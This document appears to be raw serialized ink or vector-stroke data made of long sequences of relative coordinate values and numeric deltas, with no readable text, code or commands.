0,-3 0-11,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1-1,-1-1 1,1 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,1-1-7,32-6 39,8 11-47,33-15 333,-75 9-399,6 0 16,-6 1 67,1 0 1,-1 0-1,1 0 1,-1-1 0,1 1-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,0-1-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,-1 0 1,0 0 0,1 1-1,-1-1 1,0 0-1,1 1 1,-1-1 0,0 1-1,1-1 1,-1 0-1,1 2 1,-1-1 27,1-1-8,7 0-28,-7 1-106,-1-1 111,0 1 0,0-1 0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 1,6 7-2,-6-6 2,0 0 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 1 0,0-1 0,0-1 8,8 3 14,-4 3-10,4-2-14,-7-6 4,-1 2 80,-10 20 112,10 167-109,10-143-91,-10 182 57,-10-195-23,10 79-60,-11-79-18,11 237 32,-4-260 20,3-6-1,1 0 0,-1-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,-1 1-1,1 0 1,0 0 0,-1 0 0,1 0 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 1 1,0 82 149,4-79-145,-4-4-5,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0-1 0,0 2 0,0-1-9,0 1 33,0-1 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,-1 1 1,0-1-5,2 0-17,0 3-2,0-3-3,0 0-21,0 3 16,0-3 1,-2-2-474,0 1 124,0-1 1,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1-1 0,0 1 0,0-1-1,-1 1 1,1-1 0,0 0 0,0 0-1,0 1 1,1-1 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0-3 0,-8-16-3825,-2 3 538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32,'0'0'780,"-13"6"3238,-1 0 756,-1 0-4137,-17 12-334,30-18-9,-9 7 825,11-6-1095,-1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 0 0,-1 1 0,1-1-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,0-1 0,-1 4-22,1 0 0,-1 0 1,1 0-1,0 0 0,0 1 1,0-1-1,0 1 0,1-1 1,-1 1-1,0 5 0,-11 16 31,11-22-37,-1 0-1,1 0 1,0 1 0,1-1 0,-1 0 0,0 1-1,1-1 1,0 1 0,0 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,0 7-1,1-9 6,-1 0 0,1 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1-1 0,0 1 0,0 0-1,1-1 1,-1 1 0,1-1 0,-1 1 0,1-1-1,-1 1 1,1-1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,1 0 0,58 2 129,-51-2-191,42 0 13,-50 0 54,-1-1-3,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1-1 0,9-35 24,-10 35-24,-1-1 1,0 0-1,0 0 0,-1 1 1,1-1-1,-1 0 0,0 1 0,0-1 1,0 0-1,0 1 0,-3-5 1,0-12 27,-3-2 178,6 20-149,-1 0 0,0-1-1,0 1 1,0 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-5-1 0,5 3-62,-1-1-1,1 2 0,0-1 1,0 0-1,0 0 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,-2 2 0,-57 21-2933,25-16-4151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0 508,'0'0'2842,"-41"6"3028,15 0-4176,23-4-1625,0 1 1,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,1 0-1,0 0 1,-2 5-1,-8 9 68,11-14-70,0-1-1,0 1 0,1 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,1 0 0,-1-1 1,0 1-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0-1-1,1 1 0,2 4 1,4 4 34,-7-10-99,-1 0 1,1-1-1,-1 1 1,1 0 0,-1 0-1,1 0 1,0 0-1,-1-1 1,1 1-1,0 0 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,-1-1 1,2 1 0,6 1 12,0-1 0,0 1 0,0-2 1,0 1-1,0-1 0,0 0 0,0 0 1,0-1-1,0 0 0,0-1 1,-1 1-1,1-2 0,0 1 0,-1-1 1,1 0-1,-1-1 0,0 1 1,0-2-1,-1 1 0,1-1 0,-1 0 1,10-9-1,-14 10 4,0 1 1,-1-1-1,1 0 0,-1 0 1,0-1-1,0 1 0,0 0 1,0-5-1,-1 7 48,0 0 1,0 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,0 0 0,0 0-1,1 0 1,-1 1-1,0-1 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 1 1,-1 0-1,1-1 1,-1 1-1,0 0 1,-2-2 0,0 1-29,0 0 1,-1 1-1,1-1 1,0 1-1,-1 0 1,1 1-1,0-1 1,-1 1-1,1-1 1,-9 2-1,4 0-109,-1 0 0,1 1 0,0 0 0,-1 0 0,1 1 0,0 0 1,0 0-1,1 1 0,-1 1 0,-15 10 0,4 3-1188,-22 16-8788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2 108,'0'0'1870,"11"-1"616,-11 2-1955,0 42 3906,0 35-2151,4-70-2166,3 7 232,-7-14-222,2 29 687,-1-29-841,0-1 49,0 0 0,-1 0 0,1 1 1,-1-1-1,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 1,0-1-1,1 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,0 0 0,0 0 0,0 0 112,-2 22 1119,-2-21-1181,5 0 72,2 0-153,-1-1 40,-2 0 398,0-2 83,12-5-263,17-6 90,-15 6-170,20 2-42,-28 3-112,1 0 0,-1 0 1,0 0-1,1 1 0,-1 0 0,0 0 0,1 1 1,-1-1-1,0 1 0,12 4 0,-16-4-14,-1 0 0,1 0-1,0-1 1,-1 1-1,1 0 1,0-1 0,-1 1-1,1-1 1,0 1 0,0-1-1,0 0 1,2 0 0,0 1 16,-1-1 0,1 1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0 0 0,4 2 0,-4-2 14,-1-1 12,21 4 100,-1 1-96,-15-5-50,36-1 268,-41 0-198,39 0 32,13-6 119,-9-7-96,7-10-104,-50 23-24,21-5-45,-16 5 48,-3 4 0,-4-4 0,1 0 1,-1 1 0,0-1-1,1 0 1,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1-1-1,0 1 1,1 0 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1-1-1,0 1 1,1-1 0,4-2 42,13-2 55,-15 4-114,1 0 0,-1-1-1,0 1 1,1 0-1,-1 1 1,1-1-1,-1 0 1,1 1-1,-1 0 1,1 0-1,5 1 1,31 5 22,-39-7-12,-1 0 7,1 1-1,-1-1 0,0 1 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 0,1-1 1,-1 1-1,0 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 1-1,1 0-1,0-1 1,0 1 0,0-1-1,1 0 1,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,1-1 0,-1 1-1,0 0 1,3-2-1,11 0 28,1 5-53,-15-3 86,15 0 110,-15 0-332,6 0 95,-7 0 69,-1 0 1,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1 0 0,-1-1 0,1 1 0,-1 0 0,0-1-1,1 1 1,-1 0 0,0-1 0,0 1 0,1-1 0,-1 1-1,0 0 1,1-1 0,-1 0 10,-8 5-144,8-3 46,-1-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,0-1 1,0 0-1,1 1 1,-1-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,-2 1 1,-63-24-13410,46 18 10277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1 120,'0'0'3684,"22"11"-254,-22-10-3083,1-2-164,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 1 0,1-1-1,-1 0 1,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1-1,-1 0 1,1 0 0,-1 0 0,3 0 0,31-2 2393,-30 2-2386,0-1 0,-1 2 0,1-1 0,0 1 0,0-1 0,-1 1-1,1 0 1,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,4 4 0,0-1-14,-4-3-134,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1-1 0,0 0 0,9 0 0,37 4 378,-48-3-389,0 0-1,0-1 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0-1 1,6-1-1,13-2 117,-18 4-106,1-1-1,0 1 1,-1-1-1,1 0 1,-1-1-1,1 1 1,3-3-1,-6 3-28,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 1,1 1-1,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,3 1 0,-1 0 6,1 0 1,-1 0-1,0 0 0,0-1 0,1 0 1,-1 0-1,10 1 0,72-8 47,-47 12 2,-37-6-61,21 0 105,73-18-31,-66 18-9,-28 0-68,41 0 99,-43 0-100,0-1-1,1 1 1,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,1 1-1,-1-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,-4 4 18,3-5-21,1 0 0,-1 1-1,1-1 1,0 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,0 1 0,-1-1-1,1 0 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1-1,1-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,-1-1-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1 0,1-1-1,-1 1 1,0 22 13,0-21-11,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1-1,0-1 1,0 1 0,-1-1-1,1 1 1,0 0-1,0-1 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,0 0 0,-2 3-1,3-4 0,-2 23-5,0-3-147,0-19 126,2-1 25,1 0 0,-1 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0-1 1,-1 1-1,1 0 0,0 0 0,0 0 0,0 0 1,0-1-1,-1 1 0,1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,0 0 0,-1 0 0,1-1-163,-23-22-9917,14 16 6628,-2 1 17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0 482 200,'0'13'15653,"0"-7"-14139,0-1-1195,0-11 891,54-30 443,-26 21-1618,-18 11-44,-1-1 0,0 0 0,0 0 0,-1-1 0,1 0 0,8-9 0,-11 11 45,0 0 1,0 1 0,1 0-1,-1 0 1,1 0 0,0 1-1,-1 0 1,1 0 0,9 0 0,14-6 147,154-48 137,-118 38-459,63-10 90,-116 24 88,0 0-30,0 1 0,1 0 0,-1 1 0,1 0 0,25 1 0,-21-1 1,1-1 0,0-1 0,-1 0 0,0-1 1,0-1-1,33-16 0,35-10 15,-56 22 33,-23 7-61,1 0 1,0 1-1,0-1 0,0 2 1,0-1-1,11 0 1,67-17 21,133-41 10,-180 50-34,-26 6 0,0 1 1,0 1 0,24-3-1,51-7 19,-22 6-24,-44 6 8,1 1-8,-1-1 0,0-1 0,1-2 0,25-5 0,-29 5 14,1 0 0,-1 1 0,1 1 0,0 0 0,-1 2 0,38 6 0,40 0-57,-59-7 23,0 2 0,44 7 0,-1 4 38,-41-7 50,46 12-1,-72-16-10,0-1 0,0 0 0,0 0 0,0-2 0,-1 1 1,18-5-1,29 1 223,-22 3-180,-21-1-56,-1 2 0,1 0 0,0 1-1,27 6 1,-30-5 58,0-1 0,0 0 0,0 0-1,0-2 1,0 0 0,16-3 0,27 0 407,-31 3-383,-13 0-92,0 1 0,-1 1 0,1 0 1,19 4-1,21-1 53,-7-2-91,134 16 53,7 13 770,-17-1 253,-129-27-1057,-37-3-7,0 0 0,0 0 0,0 0-1,-1 1 1,1-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,5 3-1,34 4 22,-40-6-18,1-1 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0-1 0,4 1 0,13 4 23,-17-4-18,8 0-8,-1 1 0,1 0 0,-1 0 0,1 2 1,-1-1-1,0 1 0,12 7 0,12 2 109,53 13 464,-66-22-509,0 1 0,0 1 0,-1 1 1,29 13-1,-49-16-69,-1-3 8,31 17-25,-9 13 6,-21-29 1,1 0-1,0 1 0,1-1 1,-1 0-1,0 0 0,1 0 1,-1-1-1,1 1 0,-1-1 1,1 1-1,4 1 0,-5-3 27,19 19 164,-19-16-175,0 0-1,0 0 0,1 0 1,-1 0-1,1 0 0,-1-1 0,1 1 1,0-1-1,0 0 0,0 0 1,0 0-1,0 0 0,5 1 0,-1 4 1,-5-5-1,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1-1,1 1 1,3 0 0,9 9 25,-15-9-25,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,1 0 0,0 0-7,32 6 28,-30-7-15,1 8-12,-5-6 16,0 3-5,0-3-6,-45 17-4564,34-15 2560,0-1 0,-1 0 1,1-1-1,0 0 0,-1-1 1,-16-2-1,-4 1-2001,0 1 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 28,'0'0'115,"0"-1"0,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,7-5 5994,0 7-3757,-6-11 650,-3 18-1695,-9 14-1218,9-21-82,-1 0-1,1-1 1,0 1 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,1 0 0,-1 3 0,-9 22 33,8-25-40,1 1 1,-1 0 0,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,0 4 1,0-1-1,0 0 0,0-1 0,-1 1 0,0 0 0,-1-1-1,-4 10 1,1-3 2,-44 72-55,46-79 50,1 1 0,0-1 1,0 1-1,1 0 0,-1 0 0,1 0 0,-2 10 0,4-15-8,0 0-1,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,-1 1 1,1-1 12,0 0 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,1 1 0,0 0 1,-1 0-1,1-1 0,0 4 1,-10 19 177,9-22-176,-1 0 0,1 1 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,1 0 0,-2 4 0,0-3-3,0 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,-6 3 0,8-6 0,1 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1 0-1,-1 1 1,1-1 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 1 1,0-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0-1,-1 0 1,0 2 0,1-3 19,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,18 1-56,-10-1 170,13-1 25,-16 0-147,1 1 0,-1-1 0,1 1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,6 3 0,-6-2-9,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,12-1 0,-16 0-1,26 1 163,1 2 0,-1 1 0,48 13 0,-30-2-149,29 6 7,-53-15 251,0 2 1,0 0 0,0 0 0,26 17-1,-37-16-35,-23-7-393,-27-8-6175,36 5 3984,-29-5-5397,12 1 3778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26 180,'0'-6'6146,"11"-1"-4853,-11-6 3623,-9 15-2017,7-2-1974,2 0-930,1 0 50,-1 0 0,0-1-1,1 1 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1-1,1 1 1,-1 106 63,-11-82-96,0 25-38,0 21 38,11-63 0,1-5 11,-1-1 0,0 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,0 1 0,0-1-1,1 0 1,-1 0 0,0 0-1,-3 4 1,-7 36 302,9-27-64,2-15-250,0 0-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,-1 1 0,1-1-1,0 0 1,0 0 0,0 1 0,0-1 0,-1 0-1,1 0 1,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,0 1 0,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,-2 0 113,0 10-2161,-6-14-2621,-4-20-3775,12 17 5002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32 540,'22'-31'8129,"-22"34"-6068,0 14 1442,0-12-3343,0 0 1,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,-2 8 0,2-9-138,1-1 1,0 0-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1 3 1,-4 24 51,3-27-47,0-1-1,0 1 1,0-1 0,1 1 0,-1-1-1,1 1 1,0 0 0,0 6 0,1-7 1,-1-1 1,0 1-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 0,0 0 1,0 0-1,-2 4 1,1 12 261,2-18-276,0-1 0,0 0 1,0 0-1,0 1 0,1-1 0,-1 0 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,0-1 1,-1 0-1,1 0 0,0 1 0,0-1 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 1 0,1-1 1,0 0-1,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,0 0 0,0 0 185,10-21 416,-8 20-606,1-1-1,-1 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 1,1-3-1,1-2-4,-1 1 0,1-1 0,0 1 0,1-1 0,0 1 0,0 0 0,0 0 0,1 1 0,6-10 0,13-22 6,-18 29-7,0 1 0,1 0 0,0 1 0,0-1 0,1 1 0,0 0 0,0 1 0,0 0 0,1 0 0,10-5 0,-16 9-7,11-1-23,5 3 9,-16 0 19,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,2 5 0,-2-3-6,-1 0-1,0 1 1,0-1-1,-1 0 1,1 1 0,-1-1-1,0 1 1,0 5 0,-1-3-39,0 0 0,0 1 0,0-1 0,-1 0 0,0 0 1,-6 12-1,-3 14-2412,6 3-5116,5-30 4548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26 1024,'-1'-8'6175,"3"-7"-3378,-1 14-2724,-1 1 1,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 1 1,0-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0-1,-1 0 1,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,7 17 782,-5-15-807,0 0-1,0 0 0,-1 0 0,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 0,0 1 0,0 5 1,6 22 72,-6-26-84,1 0 1,-2 0-1,1 1 1,0-1-1,-1 1 1,0-1-1,0 0 1,-1 1-1,0-1 1,0 1-1,0-1 1,-3 8 0,-2 24 481,4-29-359,-1 1 1,0-1 0,0 0-1,0 0 1,-1 0 0,-1 0-1,1 0 1,-1-1 0,-1 0-1,-10 12 1,7-12 5,-1 0-1,0 0 1,0 0-1,-1-2 1,0 1-1,0-1 1,0-1-1,-18 5 1,3 0-106,19-7-73,1 0 0,-1 0 1,0-1-1,1 0 1,-1-1-1,0 0 0,0 0 1,0 0-1,1 0 1,-1-1-1,0-1 1,-7-1-1,1 0-119,11 3-143,-1-1 0,1 0 1,-1 1-1,1-1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,1-1 0,-4-3 1,3 4-287,1-1 0,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,1-1 0,0 1 1,-1 0-1,1 0 0,0-1 1,0 1-1,1 0 0,-1 0 1,0-1-1,1 1 0,0-2 1,8-9-2584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1756,'0'0'1908,"18"-6"7911,-18 5-9813,0 1-1,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 0,0 1 1,0-1-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,6 15-473,-2-7-2750,-2 9-6400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90 1288,'-2'2'8351,"20"4"-6218,-13-5-1978,0 0 1,0 0-1,0 0 1,0-1-1,0 0 1,0 0-1,8-1 1,0-4 381,-1-1 0,0 0-1,16-11 1,-8 4 67,-19 13-582,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,0-1 0,-1-1 0,-1 0 30,-1-1 0,0 1 0,0 1 0,0-1 0,0 0 0,0 1 0,0 0 0,0 0 1,-1 0-1,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,-1 1 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 1 0,0 0 0,1 0 0,-6 3 0,-6 3 104,1 0-1,0 1 0,0 0 1,1 1-1,1 1 0,-1 0 1,2 1-1,-20 23 0,31-33-144,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,0-1-1,-1 1 1,1 0 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 